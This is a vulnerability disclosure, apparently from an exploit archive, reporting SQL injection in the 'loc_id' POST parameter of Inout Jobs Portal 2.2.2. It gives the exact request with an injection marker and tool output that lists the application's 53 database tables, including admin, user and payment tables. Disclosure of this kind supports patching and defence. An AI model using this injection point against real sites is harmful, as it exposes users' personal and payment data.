Inout Jobs Portal version 2.2.2 suffers from a remote SQL injection vulnerability.
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ C r a C k E r ββ
ββ T H E C R A C K O F E T E R N A L M I G H T ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββ From The Ashes and Dust Rises An Unimaginable crack.... βββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ [ Vulnerability ] ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: Author : CraCkEr :
β Website : inoutscripts.com β
β Vendor : Inout Scripts - Nesote Technologies Private Limited β
β Software : Inout Jobs Portal 2.2.2 β
β Vuln Type: SQL Injection β
β Impact : Database Access β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: :
β Release Notes: β
β βββββββββββββ β
β β
β SQL injection attacks can allow unauthorized access to sensitive data, modification of β
β data and crash the application or make it unavailable, leading to lost revenue and β
β damage to a company reputation β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ Β© CraCkEr 2023 ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Path: /index.php?page=jobs/searchresult
Method: POST
POST parameter 'loc_id' is vulnerable to SQLI
+-----------------------------------------------------------+
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="search_query"
web
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="c_id"
1
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="loc_id"
1[INJECT-HERE]
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="serchtype"
simple
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="c_id"
0
-----------------------------245625052541747605171577107419
+-----------------------------------------------------------+
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[INFO] fetching tables for database: '*****_jobs_portal'
Database: *****_jobs_portal
[53 tables]
+-----------------------------------------+
| nesote_inoutscripts_company_ratereview |
| nesote_inoutscripts_homepage_banner |
| nesote_inoutscripts_users |
| nesote_jobportal_admin |
| nesote_jobportal_applied_jobs |
| nesote_jobportal_city |
| nesote_jobportal_client_logs |
| nesote_jobportal_company_size |
| nesote_jobportal_company_type |
| nesote_jobportal_companyblock |
| nesote_jobportal_contents |
| nesote_jobportal_country |
| nesote_jobportal_coverletters |
| nesote_jobportal_currency |
| nesote_jobportal_email_templates |
| nesote_jobportal_employer_details |
| nesote_jobportal_employer_feedback |
| nesote_jobportal_functional_role |
| nesote_jobportal_industry |
| nesote_jobportal_ip_012023 |
| nesote_jobportal_ip_022020 |
| nesote_jobportal_ip_032020 |
| nesote_jobportal_ip_042020 |
| nesote_jobportal_ip_082021 |
| nesote_jobportal_ip_092022 |
| nesote_jobportal_ip_102022 |
| nesote_jobportal_ip_112022 |
| nesote_jobportal_ip_122022 |
| nesote_jobportal_ipn |
| nesote_jobportal_job_types |
| nesote_jobportal_jobs |
| nesote_jobportal_jobseeker_details |
| nesote_jobportal_languages |
| nesote_jobportal_locations |
| nesote_jobportal_messages |
| nesote_jobportal_months_messages |
| nesote_jobportal_news_and_events |
| nesote_jobportal_notifications |
| nesote_jobportal_packages |
| nesote_jobportal_payment_details |
| nesote_jobportal_previous_exp |
| nesote_jobportal_qualifications |
| nesote_jobportal_resumes |
| nesote_jobportal_saved_jobs |
| nesote_jobportal_saved_resumes |
| nesote_jobportal_seekers_qualifications |
| nesote_jobportal_sent_jobalerts |
| nesote_jobportal_settings |
| nesote_jobportal_skills |
| nesote_jobportal_specifications |
| nesote_jobportal_states |
| nesote_jobportal_success_story |
| nesote_jobportal_themes |
+-----------------------------------------+
[-] Done